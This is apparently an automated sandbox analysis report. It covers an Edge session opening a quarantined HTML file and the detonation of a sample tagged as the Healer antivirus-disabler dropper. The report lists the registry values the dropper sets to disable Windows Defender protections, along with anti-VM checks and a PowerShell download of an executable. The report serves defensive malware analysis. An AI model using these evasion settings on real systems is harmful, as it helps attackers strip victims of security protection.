N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4380 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 4352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 4352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e9546f8,0x7ffe4e954708,0x7ffe4e954718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 93be3a1bf9c257eaf83babf49b0b5e01
SHA1 d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a
SHA256 8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348
SHA512 885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52

\??\pipe\LOCAL\crashpad_4380_FCFZQUCWKNGHFXBO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6738f4e2490ee5070d850bf03bf3efa5
SHA1 fbc49d2dd145369e8861532e6ebf0bd56a0fe67c
SHA256 ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab
SHA512 2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4e2d71d6ff210326092dc385fb5b747f
SHA1 68bcca89c257a30cd7096c3be83b9b02fccd82b1
SHA256 2b9b0462052913ba0a94fe89845d4d192b815964a9a9e0e048b97e6e90636411
SHA512 c4c5c35db03890e457159d42e810a55a800d86092fe141e98173301056632079f7f4410557dbde8974279e49ee858bdf2ab583287f938a6d70d89c60f4d9ef6f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9267891b746e1293c1db6d863760ab97
SHA1 2a3127e67b9fa12aae0208f9c2a7f2621a703e6c
SHA256 904af23b3b22aa3ccdb8adcec50275b39a247dcd43392acd28b5f4590259dc39
SHA512 b962f39f7b86b3d83dbfc9f7c287c746b61a09ac1c9c32a2746d7829cf7687c80ef65111a89762bf961af573dbde16c3b614351d1e3004e6e89c8fc24c0eb92a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0eb92d7fc4cc6e26f79d25b61631feb4
SHA1 957dea426f86179728503af52ebb35d82249b4a5
SHA256 733e7b9e759012d667a7bde829661c20cf37a73ddaecc404ce910e3eeea45731
SHA512 36e9fdbe415afa1ed3af270d007c3a28bfbbc1379a29f50e26339f72e6eafd547a933d209543c32b75fe3d3340452dfafe82ba497c21c818c34b8d4e9ee70bc8

Analysis: behavioral25

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

